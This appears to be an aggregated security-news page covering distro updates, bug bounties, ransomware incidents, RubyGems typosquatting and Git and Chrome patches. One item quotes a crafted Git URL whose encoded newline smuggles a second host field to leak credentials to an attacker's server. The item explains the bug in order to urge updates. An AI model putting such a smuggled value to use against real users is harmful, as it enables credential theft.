Language Selection

English French German Italian Portuguese Spanish

Security

Security Leftovers

Filed under
Security
  • Security updates for Thursday

    Security updates have been issued by Arch Linux (openssl), openSUSE (freeradius-server, kernel, thunderbird, and vlc), Oracle (git, java-1.7.0-openjdk, java-1.8.0-openjdk, and java-11-openjdk), SUSE (ardana-ansible, ardana-barbican, ardana-db, ardana-monasca, ardana-mq, ardana-neutron, ardana-octavia, ardana-tempest, crowbar-core, crowbar-ha, crowbar-openstack, documentation-suse-openstack-cloud, memcached, openstack-manila, openstack-neutron, openstack-nova, pdns, python-amqp, rubygem-puma, zookeeper, cups, kernel, ovmf, and pacemaker), and Ubuntu (openjdk-8, openjdk-lts and re2c).

  • Daniel Stenberg: Report: curl’s bug bounty one year in

    On April 22nd 2019, we announced our current, this, incarnation of the curl bug bounty. In association with Hackerone we now run the program ourselves, primarily funded by gracious sponsors. Time to take a closer look at how the first year of bug bounty has been!

  • Firefox’s Bug Bounty in 2019 and into the Future

    Firefox has one of the oldest security bug bounties on the internet, dating back to 2004. From 2017-2019, we paid out $965,750 to researchers across 348 bugs, making the average payout $2,775 – but as you can see in the graph below, our most common payout was actually $4,000!

  • Multiple Malware Campaigns Demonstrate How Cybercriminals Exploit SSH Keys
  • How Healthcare Providers Can Prevent Security Vulnerabilities

    Unfortunately, despite strict compliance regulations, there are still many exploited vulnerabilities misconfigurations that occur in healthcare systems. These issues can result in serious breaches of security and patient privacy and must be corrected.

    Some of these issues are outside of your control. For example, if vendors unknowingly leave bugs in software or have not yet provided a patch for known vulnerabilities. Others occur due to poor management or lack of best practices. For example, not properly restricting access privileges or not encrypting data.

    [...]

    The consequences of a regular data breach range from monetary fines to loss of brand authority, and sometimes even bankruptcy. However, the consequences of a breached healthcare environment can be a matter of life and death.

    To ensure the security of healthcare data, providers should implement a number of strategies. Security strategies for healthcare providers include enforcing granular access controls, as well as staying updated on vulnerabilities and prioritizing mitigation on a continual basis.

    For improved visibility and better control, you can also centralize your overall security. However, what could help most is establishing a security culture that educates personnel and reduces the scope of insider threats. This can help enlist connected users to the overall protection of healthcare networks, systems, and data.

  • Microsoft Issues Out-Of-Band Security Update For Office, Paint 3D

    Microsoft has released an out-of-band security update for Microsoft Office, Office 365 ProPlus and Paint 3D. The applications are affected by multiple Autodesk vulnerabilities that, if exploited, could enable remote code execution.

Locking Down Linux For The Enterprise

Filed under
GNU
Linux
Security
Ubuntu

Security has always been important for datacenter operators, but the days of putting a ring of protection around the datacenter and then walking away satisfied in the knowledge that the data and applications therein were protected from outside forces are long over. Cloud computing, the Internet of Things (IoT), the edge, containers and the rapid growth in the number of mobile devices have all contributed to the expansion of IT outside of core datacenters, creating a highly distributed environment where the bulk of data is created and applications are access beyond the firewall. Add in the growing numbers and increasing sophistication of cyber-threats and security becomes a much more complex calculation.

Because of this, the growing expectation for years now has been that hardware, component and software makers would embed security into their products to ensure security regardless of whether they were running in the datacenter or somewhere out in the wild. Enterprises will gravitate toward vendors with reputations for strong security and privacy features in their offerings, which can drive growth for those that make the investment. It’s something that Canonical is emphasizing as it looks to extend its open-source Ubuntu Linux operating system deeper into the enterprise and cloud datacenters.

Read more

IPFire 2.25 - Core Update 144 is available for testing

Filed under
GNU
Linux
Security

Less than 48 hours after releasing IPFire 2.25 - Core Update 143, we already have the next update ready for testing. It is full with fixes for security vulnerabilities in OpenSSL, the squid web proxy, the DHCP client and more.

The OpenSSL team has issued a security advisory for the 1.1.1 release with "high" severity.

Applicants on client or service side that call SSL_check_chain() during a TLSv1.3 handshake may crash the application due to incorrect handling of the signature_algorithms_cert" TLS extension.

CVE-2020-1967 has been assigned to track this vulnerability and an immediate installation of this update is recommended.

Read more

Security Leftovers

Filed under
Security
  • Why Online Voting Won't Work, Even in a Pandemic

    But as Motherboard has reported extensively, voting machines and using the internet in any way to exercise our most democratic right could call into question the integrity of the results and leave systems vulnerable to manipulation. Or, as the Democratic party discovered during its Iowa caucuses this past January, the entire vote count is at the mercy of a terrible app.

    On this week’s CYBER we have Motherboard reporter Lorenzo Franceschi-Bicchierai on to discuss why online voting isn't ready for prime time.

  • Massachusetts, Indiana Settle With Equifax Over 2017 Data Breach

    As part of a settlement approved in January, Equifax will have to set aside $380 million for payments to affected individuals, attorney fees of $80 million, and other costs. The states that filed a lawsuit against the company will receive a total of $175 million.

    However, Massachusetts and Indiana are not included in that multistate settlement as they filed their own lawsuits against Equifax. The attorneys general of Massachusetts and Indiana announced last week that they have each reached a settlement with the company for $18.2 million and $19.5 million, respectively.

    The Equifax breach impacted roughly 3.9 million residents of Indiana and nearly 3 million people in Massachusetts.

  • Detroit hospital network says data breach affected more than 100,000 patient accounts [iophk: Windows TCO]

    The attack against the hospital network occurred months before U.S. facilities started responding to the COVID-19 pandemic.

  • Beaumont security breach puts personal information of 112,000 people at risk [iophk: Windows TCO]

    Beaumont discovered in late March that employee email accounts had been accessed May 23-June 3, 2019 by a third party, potentially compromising such patient information as name, date of birth, diagnosis, diagnosis code, procedure, treatment location, treatment type, prescription information, Beaumont patient account number, and Beaumont medical record number.

  • IT Services Giant Cognizant Attacked by ‘Maze’ Ransomware [iophk: Windows TCO]

    The company, which has about 300,000 employees, said it was hit by the “Maze” #ransomware group and is engaging law enforcement authorities.

  • Cognizant Hit by 'Maze' Ransomware Attack [iophk: Windows TCO]

    According to cybersecurity firm McAfee, [attackers] who deploy Maze threaten to release information on the [Internet] if the targeted companies fail to pay.

    "We are in ongoing communication with our clients and have provided them with indicators of compromise and other technical information of a defensive nature," Cognizant added.

    It did not respond to a request from Reuters for further comments on the incident.

  • Cognizant hit by ‘Maze’ ransomware attack [iophk: Windows TCO]

    “Cognizant can confirm that a security incident involving our internal systems, and causing service disruptions for some of our clients, is the result of a Maze ransomware attack,” Cognizant said in a statement. It added that its internal security teams, supplemented by leading cyber defense firms, are actively taking steps to contain this incident.

  • Cognizant hit by 'Maze' ransomware attack [iophk: Windows TCO]

    New-Jersey headquartered IT services provider Cognizant on Saturday said that it had faced a ransomware attack on Saturday that has caused disruptions to its clients.

    The company released a statement on Saturday on its official website. “Cognizant can confirm that a security incident involving our internal systems, and causing service disruptions for some of our clients, is the result of a Maze ransomware attack,” it said.

    The Maze ransomware was discovered in 2019 and has since gained notoriety.

  • COVID-19’s impact on Tor

    We had to let go of 13 great people who helped make Tor available to millions of people around the world. We will move forward with a core team of 22 people, and remain dedicated to continuing our work on Tor Browser and the Tor software ecosystem.

  • Tor Project lets go of a third of staff due to COVID-19

    The Tor Project, the non profit organization behind the Tor (The Onion Router) Browser, has let go of roughly a third of its staff due to the COVID-19 crisis. Tor is known as a private browser developed for use by dissidents in oppressive countries and others that need their internet use anonymized. Tech companies and organizations around the world have been affected by this pandemic, and it’s sobering to see the Tor Project have to let go of staff during this time period where Tor use is arguably ever more crucial.

  • Security updates for Tuesday

    Security updates have been issued by Arch Linux (webkit2gtk), Debian (awl, git, and openssl), Red Hat (chromium-browser, git, http-parser, java-1.7.0-openjdk, java-1.8.0-openjdk, java-11-openjdk, qemu-kvm-ma, rh-git218-git, and rh-maven35-jackson-databind), Scientific Linux (advancecomp, avahi, bash, bind, bluez, cups, curl, dovecot, doxygen, evolution, expat, file, firefox, gettext, git, GNOME, httpd, ImageMagick, java-1.7.0-openjdk, java-1.8.0-openjdk, java-11-openjdk, kernel, lftp, libosinfo, libqb, libreoffice, libsndfile, libxml2, mailman, mariadb, mod_auth_mellon, mutt, nbdkit, net-snmp, okular, php, polkit, poppler and evince, python, python-twisted-web, python3, qemu-kvm, qt, rsyslog, samba, squid, taglib, telnet, texlive, thunderbird, unzip, wireshark, and zziplib), SUSE (apache2), and Ubuntu (git and python2.7, python3.4, python3.5, python3.6, python3.7).

  • Russian IT Security Updates

    As part of the April „fix Tuesday“, Microsoft fixed 113 vulnerabilities in various products, including three zero-day vulnerabilities in Windows that were used in attacks to execute arbitrary code and increase privileges.

    Two zero-day issues (CVE-2020-1020 and CVE-2020-0938) were contained in Adobe Type Manager Library and affected all supported versions of Windows, including Windows 7.

    the Third vulnerability ( CVE-2020-1027 ) affected the Windows kernel and allowed the attacker to increase their privileges and execute code with kernel privileges.

Chromium/Chrome Issues

Filed under
Google
Security
Web
  • Over 2 billion Google Chrome users warned of security risk on Windows, macOS and Linux

    Google has issued a critical warning for Chrome users across Windows, macOS and Linux, and has advised users to update their apps to the latest version of the build. A stable release version 81.0.4044.113 of Chrome is being seeded by Google and will reach users in the coming weeks.

    In a short blog post, Google warned users of its popular browser Chrome to update to the latest version whenever available. This is due to a bug that made the browser vulnerable to attack and exploitation. Having said that, the details about this particular security risk is being kept under wraps as Google wants to first get the latest update to users that fixes the issue.

  • Google Releases Much-Awaited Chrome Update; Alerts 2 Billion Users About Security Flaws Across Windows, Mac & Linux

    "The stable channel has been updated to 81.0.4044.113 for Windows, Mac, and Linux, which will roll out over the coming days/weeks," Google said in a blog post last week. "This update includes 1 security fix," it added.

    [...]

    "The community help forum is also a great place to reach out for help or learn about common issues," Google said. "Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," it added.

  • Google Issues Warning For 2 Billion Chrome Users

    Are you a Google Chrome user? Google has issued a warning of a vulnerability in its Chrome browser across Windows, Mac and Linux - urging users to upgrade to the latest version of the browser (81.0.4044.113).

    Google just gave its two billion Chrome users a brilliant (if long overdue) upgrade, but it doesn’t mask all of the controversial changes, security problems and data concerns which have worried users about the browser recently. And now Google has issued a new critical warning you need to know about.

    Picked up by security specialist Sophos, Google has quietly issued a warning that Chrome has a critical security flaw across Windows, Mac and Linux and it urges users to upgrade to the latest version of the browser (81.0.4044.113). Interestingly, at the time of publication, Google is also keeping the exact details of the exploit a mystery.

  • Google Chrome and desktop icon refresh problem

    Looking around, I did find a Chromium bug report from 2015, which also mentioned a workaround. Needless to say, the specific workaround is no longer available, as the user icon is no longer present in the Chrome window border, and flags occasionally come and go, as they represent experimental browser features. But this was a good starting point, so I went about testing and tweaking, until I found the right solution. After me.

Wireguard – the open-source answer to VPN shortfalls?

Filed under
GNU
OSS
Security

Most end-users’ experiences of VPNs (virtual private networks) are from when they’ve needed to “dial into” the office or workplace, remotely.

That’s something that, right now, millions of people have to do from their homes. And while many organizations’ resources are located in the cloud, there’s still a significant number of services, applications, filestores, and resources that are on-premise — thus the continuing need for VPNs to gain access.
READ NEXT
VPN providers put to the test as millions work from home

“Dialing-in” is often still the terminology used in conversation, but that’s ironic because the process of working inside a VPN “tunnel” is very much reminiscent of the days of dial-up internet connections: slow to establish connection, glacial in responsiveness of apps & services, prone to breaking, and often the subject of frustration (and irritable calls to IT support staff).

Read more

Git v2.26.2 and others

Filed under
Development
Security
  • Git v2.26.2 and others
    Today, the Git project is releasing the following Git versions:
    
        v2.26.2, v2.25.4, v2.24.3, v2.23.3, v2.22.4, v2.21.3, v2.20.4,
        v2.19.5, v2.18.4, and v2.17.5.
    
    These releases address the security issue CVE-2020-11008, which is
    similar to the recently addressed CVE-2020-5260.
    
    Users of the affected maintenance tracks are urged to upgrade.
    
    The tarballs are found at:
    
        https://www.kernel.org/pub/software/scm/git/
    
    The following public repositories all have a copy of the 'v2.26.2'
    and other tags:
    
      url = https://kernel.googlesource.com/pub/scm/git/git
      url = git://repo.or.cz/alt-git.git
      url = https://github.com/gitster/git
    
    Attached below is the release notes for 2.17.5; all the newer
    maintenance tracks listed at the beginning of this message are
    updated with the same fix, so I won't repeat them here.
    
    Thanks.
    
  • Git Sees Another Round Of New Releases Due To Security Issue

    Last week saw a slew of new Git releases due to a security issue over the newline character creating a possible credential leak. This week is another round of emergency Git releases due to a similar security bug.

    Git 2.26.2 is out today along with new point releases from Git 2.25 through Git 2.17. These new Git releases are coming as a result of a similar security bug to last week's problem.

IPFire 2.25 - Core Update 143 released

Filed under
Security

Hey all you cool cats and kittens,

this is the official release announcement for IPFire 2.25 - Core Update 143 - another update that brings you loads of improvements for IPFire and its build system. We have updated the toolchain and many other essential system libraries as well as including many bug and security fixes.

The toolchain - all tools to build the distribution like compilers, linkers and essential system libraries - have been updated and are now based on glibc 2.31, GCC 9.3.0, binutils 2.34.

The build system has also been optimised to take advantage of machines that have a lot of memory and uses less I/O resources by not writing any large temporary files to disk any more when this can be avoided.

Read more

Security and FUD

Filed under
GNU
Linux
Security
  • Security updates for Monday

    Security updates have been issued by Arch Linux (openvpn), Debian (awl, file-roller, jackson-databind, and shiro), Fedora (chromium, git, and libssh), Mageia (php, python-bleach, and webkit2), openSUSE (chromium, gstreamer-rtsp-server, and mp3gain), Oracle (thunderbird and tigervnc), SUSE (thunderbird), and Ubuntu (file-roller and webkit2gtk).

  • Linus is secure - it is its users who are not

    Most exploits are misconfigurations or poor administration

    The rise in attacks on Linux in recent years is not due to its insecurity problems but more down to user error.

    LinuxSecurity Founder Dave Wreski said: "Although it may be easy to blame the rise in attacks targeting Linux in recent years on security vulnerabilities in the operating system as a whole, this is simply not the truth. The majority of exploits on Linux systems can be attributed to misconfigured servers and poor administration."

    Joe McManus, Director of Security at Canonical, said: "Linux and, particularly Ubuntu, are incredibly secure systems but, that being said, it is their popularity that makes them a target."

    Ian Thornton-Trump, a threat intelligence expert and the CISO at Cyjax, added: "From an economic and mission perspective, it makes sense for a threat actor to invest in open-source skills for flexibility and the ability to target the systems where the good stuff is happening."

  • 01 Communique Announces April 23rd IronCAP X Email Encryption Product Launch and Demo Will Be Virtual [Ed: If this is proprietary secret code, how do we know it is indeed "a higher protection level than current GPG, or GNU Privacy Guard public key cryptography implementation platforms"?]

    IronCAP and IronCAP X will encrypt your data so that you are protected now and into the future from quantum attacks. Not only is IronCAP technology quantum-safe, it is much faster than the current quantum-vulnerable RSA method and has a higher protection level than current GPG, or GNU Privacy Guard public key cryptography implementation platforms.

Security and Proprietary Issues

Filed under
Security
  • Bitcoin stealer infected 700+ libraries of major programming language

    A cybersecurity firm discovered that over 700 libraries of the popular programming language, Ruby, contained malicious Bitcoin-stealing software.

    ReversingLabs, based in Cambridge, Massachusetts, disclosed its findings in a blog post on Thursday. Back in February, it wrote, hackers placed malicious files inside a package manager called RubyGems—which is usually used to upload and share improvements on existing pieces of software.

    The hackers were trying to trick developers into downloading malware by using a method called “typosquatting”, which consists of uploading malicious packages with similar names to regular ones. By just changing a few characters of a file name, the hope was that a developer would mistakenly download an infected package—unwittingly providing the hacker with access to their system.

  • Find the Sweet Spot: Open Source Software, Military Systems and Cybersecurity
  • This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

    Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
    url = "https://one.example.com?%0ahost=two.example.com/foo.git"

    So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.

  • Alibaba to Invest $28 Billion Over Three Years in Cloud

    The Chinese e-commerce giant plans to build more datacenters to complement an existing network covering 21 regions around the world, the company said in a statement. It will continue to develop its own technologies in areas such as AI-inference chips to support that expansion in cloud services, it added.

  • Hospitals brace for increase in cyberattacks

    As hospitals face a surge in patients and critical equipment shortages stemming from the coronavirus pandemic, they are increasingly becoming the target of [attackers] who see health care facilities as easy prey.

    Ransomware attacks, in which [attackers] lock up a network and demand payment to return access to these systems, have presented a growing threat to hospitals since January.

    Experts are warning that they expect these attacks to increase and that the threat has captured the attention of top intelligence lawmakers, who warn the outbreak and the ransomware attacks create the perfect storm.

  • CDC plans to roll out app in May to speed up COVID-19 case reporting

    The Centers for Disease Control and Prevention (CDC) plans to roll out an app in May that will accelerate electronic case reporting of COVID-19 cases.

    The app, based on Fast Healthcare Interoperability Resources (FHIR) standards, can be implemented quickly to automate COVID case reporting, said Laura Conn, health scientist and eCR lead in the CDC's Center for Surveillance, Epidemiology, and Laboratory Services.

    The app enables healthcare providers that don't have the capability to automatically send case reports from their health IT systems to more efficiently send data to public health agencies.

  • Judge dismisses Twitter lawsuit pushing to reveal US surveillance requests

    Rogers clarified that the government’s use of confidential declarations convinced her that unearthing the exact number of national security letters dating back to 2014, as requested by Twitter, would put national security at risk.

Syndicate content